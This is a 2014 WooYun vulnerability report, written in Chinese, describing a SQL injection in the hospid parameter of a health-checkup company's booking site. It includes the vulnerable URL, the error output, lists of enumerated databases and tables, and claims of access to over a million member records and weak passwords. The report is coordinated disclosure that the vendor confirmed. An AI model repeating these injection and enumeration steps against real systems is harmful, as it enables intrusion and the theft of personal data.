当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-073820

漏洞标题:爱康国宾某问题可导致110W用户信息泄露

相关厂商:爱康国宾

漏洞作者: 小胖子

提交时间:2014-08-25 18:49

修复时间:2014-10-09 18:50

公开时间:2014-10-09 18:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-25: 细节已通知厂商并且等待厂商处理中
2014-08-26: 厂商已经确认,细节仅向厂商公开
2014-09-05: 细节向核心白帽子及相关领域专家公开
2014-09-15: 细节向普通白帽子公开
2014-09-25: 细节向实习白帽子公开
2014-10-09: 细节向公众公开

简要描述:

话不多说,我是来刷WB参加众测的。

详细说明:

问题站点:http://hao.ikang.com
随便点击一个医院,最后形成连接
http://hao.ikang.com/?city=0021&Action=Operator&hospid=002
hospid存在注入,加个单引号报错

SELECT * FROM HOSPOPER WHERE HOSPID='002'' and (YKT_FLAG=0 or YKT_FLAG=2) ORDER BY OPERNAME ASCJKCITY数据库错误!请联系系统管理员解决。DB Error: unknown error
Notice: JKCITY数据库错误!请联系系统管理员解决。DB Error: unknown error in /web/mis9/libs/DatabaseJk.php on line 54


这里爆出表还方便我们等下查密码。

sqlin.jpg


然后有好多个数据库,好像这台是你们的主数据库服务器

available databases [38]:
[*] APEX_030200
[*] APPQOSSYS
[*] BA
[*] CMS
[*] CTXSYS
[*] DBSNMP
[*] DEPO
[*] EP
[*] EXFSYS
[*] FLOWS_FILES
[*] GOME
[*] IKANG
[*] IKANG_LDAP
[*] IKANGLIS
[*] IKANGMIS3
[*] IKANGMIS3NEW
[*] JKCITY
[*] MDSYS
[*] MEC
[*] MIS2
[*] MISNEW
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] QCMS
[*] RMS
[*] SURVEY
[*] SYS
[*] SYSTEM
[*] THIRDPARTY
[*] TP
[*] TRT
[*] WMSYS
[*] WWW
[*] XDB
[*] ZHIFUBAO


至少挂载着这些系统
http://mec.ikang.com/
http://qcms.ikang.com/
http://mis2.ikang.com/
很多都是简单的md5加密,甚至是明文密码
trt的弱口令

ruokl TRT.jpg


tingka.jpg


hao的

6666.jpg


反正很多系统都能进,很多库很多数据
MIS2和MISNEW下的member库
110多万会员信息呢

1168644.jpg


漏洞证明:

Database: WWW
[44 tables]
+------------------------------+
| ACCT_DEPARTMENT |
| ACCT_USER |
| BLOCK_CONFIG |
| CARD_BLOCK_PERMISSION |
| CARD_CHANGE_PASSWORD_INFO |
| CITY_TEL_CODE |
| HOT_TRACK |
| IDENTIFY_INFO_BLOCK |
| IKCT_FILTER_CHAIN_DEFINITION |
| IKCT_GROUP |
| IKCT_GROUP_PERMISSION |
| IKCT_MENU |
| IKCT_PERMISSION |
| IKCT_USER |
| IKCT_USER_GROUP |
| JA_CONSULT |
| MIS_MEMBER_INFO |
| OTHER_CONFIG_BLOCK |
| PERMISSION |
| PLATFORM |
| PLATFORM_ADMIN_BLOCK |
| PLATFORM_BLOCK |
| PLATFORM_COMMON_CONFIG |
| PLATFORM_PROJECT |
| PLATFORM_TEMPLATE |
| UPGRADE_ITEM |
| WEIXINUSER_BAK |
| WEIXIN_ACTIVITY |
| WEIXIN_ANSWER |
| WEIXIN_BIND |
| WEIXIN_GAME |
| WEIXIN_GAME_SCORE |
| WEIXIN_GAME_SCORE20140411 |
| WEIXIN_LUCKY |
| WEIXIN_MOBILE_BIND |
| WEIXIN_MSG |
| WEIXIN_PACKAGE |
| WEIXIN_QUESTION |
| WEIXIN_REMARK |
| WEIXIN_SALEINFO |
| WEIXIN_USER |
| WEIXIN_WQ |
| WIFI |
| WINXIN_ACCESSTOKEN |
+------------------------------+
Database: SYSTEM
[160 tables]
+-------------------------------+
| AQ$_INTERNET_AGENTS |
| AQ$_INTERNET_AGENT_PRIVS |
| AQ$_QUEUES |
| AQ$_QUEUE_TABLES |
| AQ$_SCHEDULES |
| DEF$_AQCALL |
| DEF$_AQERROR |
| DEF$_CALLDEST |
| DEF$_DEFAULTDEST |
| DEF$_DESTINATION |
| DEF$_ERROR |
| DEF$_LOB |
| DEF$_ORIGIN |
| DEF$_PROPAGATOR |
| DEF$_PUSHED_TRANSACTIONS |
| HELP |
| LOGMNRC_DBNAME_UID_MAP |
| LOGMNRC_GSBA |
| LOGMNRC_GSII |
| LOGMNRC_GTCS |
| LOGMNRC_GTLO |
| LOGMNRGGC_GTCS |
| LOGMNRGGC_GTLO |
| LOGMNRP_CTAS_PART_MAP |
| LOGMNRT_MDDL$ |
| LOGMNR_AGE_SPILL$ |
| LOGMNR_ATTRCOL$ |
| LOGMNR_ATTRIBUTE$ |
| LOGMNR_CCOL$ |
| LOGMNR_CDEF$ |
| LOGMNR_COL$ |
| LOGMNR_DICTIONARY$ |
| LOGMNR_DICTSTATE$ |
| LOGMNR_ENC$ |
| LOGMNR_ERROR$ |
| LOGMNR_FILTER$ |
| LOGMNR_GLOBAL$ |
| LOGMNR_GT_TAB_INCLUDE$ |
| LOGMNR_GT_USER_INCLUDE$ |
| LOGMNR_GT_XID_INCLUDE$ |
| LOGMNR_ICOL$ |
| LOGMNR_IND$ |
| LOGMNR_INDCOMPART$ |
| LOGMNR_INDPART$ |
| LOGMNR_INDSUBPART$ |
| LOGMNR_INTEGRATED_SPILL$ |
| LOGMNR_KOPM$ |
| LOGMNR_LOB$ |
| LOGMNR_LOBFRAG$ |
| LOGMNR_LOG$ |
| LOGMNR_LOGMNR_BUILDLOG |
| LOGMNR_NTAB$ |
| LOGMNR_OBJ$ |
| LOGMNR_OPQTYPE$ |
| LOGMNR_PARAMETER$ |
| LOGMNR_PARTOBJ$ |
| LOGMNR_PROCESSED_LOG$ |
| LOGMNR_PROPS$ |
| LOGMNR_REFCON$ |
| LOGMNR_RESTART_CKPT$ |
| LOGMNR_RESTART_CKPT_TXINFO$ |
| LOGMNR_SEED$ |
| LOGMNR_SESSION$ |
| LOGMNR_SESSION_ACTIONS$ |
| LOGMNR_SESSION_EVOLVE$ |
| LOGMNR_SPILL$ |
| LOGMNR_SUBCOLTYPE$ |
| LOGMNR_TAB$ |
| LOGMNR_TABCOMPART$ |
| LOGMNR_TABPART$ |
| LOGMNR_TABSUBPART$ |
| LOGMNR_TS$ |
| LOGMNR_TYPE$ |
| LOGMNR_UID$ |
| LOGMNR_USER$ |
| LOGSTDBY$APPLY_MILESTONE |
| LOGSTDBY$APPLY_PROGRESS |
| LOGSTDBY$EDS_TABLES |
| LOGSTDBY$EVENTS |
| LOGSTDBY$FLASHBACK_SCN |
| LOGSTDBY$HISTORY |
| LOGSTDBY$PARAMETERS |
| LOGSTDBY$PLSQL |
| LOGSTDBY$SCN |
| LOGSTDBY$SKIP |
| LOGSTDBY$SKIP_SUPPORT |
| LOGSTDBY$SKIP_TRANSACTION |
| MVIEW$_ADV_AJG |
| MVIEW$_ADV_BASETABLE |
| MVIEW$_ADV_CLIQUE |
| MVIEW$_ADV_ELIGIBLE |
| MVIEW$_ADV_EXCEPTIONS |
| MVIEW$_ADV_FILTER |
| MVIEW$_ADV_FILTERINSTANCE |
| MVIEW$_ADV_FJG |
| MVIEW$_ADV_GC |
| MVIEW$_ADV_INDEX |
| MVIEW$_ADV_INFO |
| MVIEW$_ADV_JOURNAL |
| MVIEW$_ADV_LEVEL |
| MVIEW$_ADV_LOG |
| MVIEW$_ADV_OUTPUT |
| MVIEW$_ADV_OWB |
| MVIEW$_ADV_PARAMETERS |
| MVIEW$_ADV_PARTITION |
| MVIEW$_ADV_PLAN |
| MVIEW$_ADV_PRETTY |
| MVIEW$_ADV_ROLLUP |
| MVIEW$_ADV_SQLDEPEND |
| MVIEW$_ADV_TEMP |
| MVIEW$_ADV_WORKLOAD |
| OL$ |
| OL$HINTS |
| OL$NODES |
| REPCAT$_AUDIT_ATTRIBUTE |
| REPCAT$_AUDIT_COLUMN |
| REPCAT$_COLUMN_GROUP |
| REPCAT$_CONFLICT |
| REPCAT$_DDL |
| REPCAT$_EXCEPTIONS |
| REPCAT$_EXTENSION |
| REPCAT$_FLAVORS |
| REPCAT$_FLAVOR_OBJECTS |
| REPCAT$_GENERATED |
| REPCAT$_GROUPED_COLUMN |
| REPCAT$_INSTANTIATION_DDL |
| REPCAT$_KEY_COLUMNS |
| REPCAT$_OBJECT_PARMS |
| REPCAT$_OBJECT_TYPES |
| REPCAT$_PARAMETER_COLUMN |
| REPCAT$_PRIORITY |
| REPCAT$_PRIORITY_GROUP |
| REPCAT$_REFRESH_TEMPLATES |
| REPCAT$_REPCAT |
| REPCAT$_REPCATLOG |
| REPCAT$_REPCOLUMN |
| REPCAT$_REPGROUP_PRIVS |
| REPCAT$_REPOBJECT |
| REPCAT$_REPPROP |
| REPCAT$_REPSCHEMA |
| REPCAT$_RESOLUTION |
| REPCAT$_RESOLUTION_METHOD |
| REPCAT$_RESOLUTION_STATISTICS |
| REPCAT$_RESOL_STATS_CONTROL |
| REPCAT$_RUNTIME_PARMS |
| REPCAT$_SITES_NEW |
| REPCAT$_SITE_OBJECTS |
| REPCAT$_SNAPGROUP |
| REPCAT$_TEMPLATE_OBJECTS |
| REPCAT$_TEMPLATE_PARMS |
| REPCAT$_TEMPLATE_REFGROUPS |
| REPCAT$_TEMPLATE_SITES |
| REPCAT$_TEMPLATE_STATUS |
| REPCAT$_TEMPLATE_TARGETS |
| REPCAT$_TEMPLATE_TYPES |
| REPCAT$_USER_AUTHORIZATIONS |
| REPCAT$_USER_PARM_VALUES |
| SCHEDULER_JOB_ARGS_TBL |
| SCHEDULER_PROGRAM_ARGS_TBL |
| SQLPLUS_PRODUCT_PROFILE |
+-------------------------------+

修复方案:

0x1:不要把所有数据库都放在一台服务器上撒,居然还能跨库读取
0x2:处理注入点
0x3:求20rank

版权声明:转载请注明来源 小胖子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-08-26 11:56

厂商回复:

非常感谢此漏洞的发现,已经确认,我们尽快处理,谢谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2014-08-25 18:56 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    洞主好实在....

  2. 2014-08-25 19:00 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    目测是注入

  3. 2014-08-26 15:32 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    ...又一个20

  4. 2014-10-09 20:27 | 大漠長河 ( 实习白帽子 | Rank:43 漏洞数:7 | ̷̸̨̀͒̏̃ͦ̈́̾( 天龙源景区欢迎您...)

    楼主的修复方案对于厂商简直是耳边风曝光曝光接着曝光才能引起重视